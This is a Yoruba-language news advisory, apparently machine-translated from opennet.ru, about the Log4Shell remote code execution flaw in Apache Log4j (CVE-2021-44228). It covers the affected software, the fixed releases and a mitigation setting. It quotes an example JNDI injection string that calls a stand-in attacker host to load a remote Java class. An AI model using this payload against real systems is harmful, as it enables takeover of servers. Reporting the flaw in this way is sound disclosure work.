Ni Apache Log4j, ilana olokiki fun siseto gedu ni awọn ohun elo Java, ailagbara pataki kan ti jẹ idanimọ ti o fun laaye koodu lainidii lati ṣiṣẹ nigbati iye ti a ṣe ni pataki ni ọna kika “{jndi:URL}” ti kọ si akọọlẹ naa. Ikọlu naa le ṣee ṣe lori awọn ohun elo Java ti o wọle awọn iye ti o gba lati awọn orisun ita, fun apẹẹrẹ, nigbati o ṣafihan awọn iye iṣoro ninu awọn ifiranṣẹ aṣiṣe.
O ṣe akiyesi pe o fẹrẹ jẹ gbogbo awọn iṣẹ akanṣe nipa lilo awọn ilana bii Apache Struts, Apache Solr, Apache Druid tabi Apache Flink ni ipa nipasẹ iṣoro naa, pẹlu Steam, Apple iCloud, awọn alabara Minecraft ati awọn olupin. O nireti pe ailagbara le ja si igbi ti awọn ikọlu nla lori awọn ohun elo ile-iṣẹ, tun ṣe itan-akọọlẹ ti awọn ailagbara pataki ninu ilana Apache Struts, eyiti, ni ibamu si iṣiro inira, ti lo ninu awọn ohun elo wẹẹbu nipasẹ 65% ti Fortune. Awọn ile-iṣẹ 100. Pẹlu awọn igbiyanju lati ṣayẹwo nẹtiwọki fun awọn ọna ṣiṣe ipalara.
Iṣoro naa buru si nipasẹ otitọ pe a ti tẹjade iṣamulo ti n ṣiṣẹ tẹlẹ, ṣugbọn awọn atunṣe fun awọn ẹka iduroṣinṣin ko ti ṣajọpọ. Idanimọ CVE ko tii ti sọtọ. Atunṣe naa wa ninu ẹka idanwo log4j-2.15.0-rc1. Gẹgẹbi iṣẹ-ṣiṣe fun didi ailagbara naa, o gba ọ niyanju lati ṣeto paramita log4j2.formatMsgNoLookups si otitọ.
Iṣoro naa ṣẹlẹ nipasẹ otitọ pe log4j ṣe atilẹyin sisẹ awọn iboju iparada pataki “{}” ni awọn laini ti o jade si akọọlẹ, ninu eyiti awọn ibeere JNDI (Java Naming and Directory Interface) le ṣe ṣiṣe. Ikọlu naa ṣan silẹ lati kọja okun kan pẹlu aropo “${jndi:ldap://attacker.com/a}”, lori ṣiṣe eyiti log4j yoo firanṣẹ ibeere LDAP kan fun ọna si kilasi Java si olupin attacker.com . Ọna ti o pada nipasẹ olupin ikọlu (fun apẹẹrẹ, http://second-stage.attacker.com/Exploit.class) yoo jẹ ti kojọpọ ati ṣiṣe ni agbegbe ti ilana lọwọlọwọ, eyiti o fun laaye ikọlu lati ṣiṣẹ koodu lainidii lori eto pẹlu awọn ẹtọ ti ohun elo lọwọlọwọ.
Afikun 1: Ailagbara naa ti ni idamọ CVE-2021-44228.
Addendum 2: Ọna kan lati fori aabo ti a ṣafikun nipasẹ itusilẹ log4j-2.15.0-rc1 ti jẹ idanimọ. Imudojuiwọn tuntun, log4j-2.15.0-rc2, ti dabaa pẹlu aabo pipe diẹ sii lodi si ailagbara naa. Koodu naa ṣe afihan iyipada ti o ni nkan ṣe pẹlu isansa ti ifopinsi aiṣedeede ninu ọran ti lilo URL JNDI ti ko tọ.
orisun: opennet.ru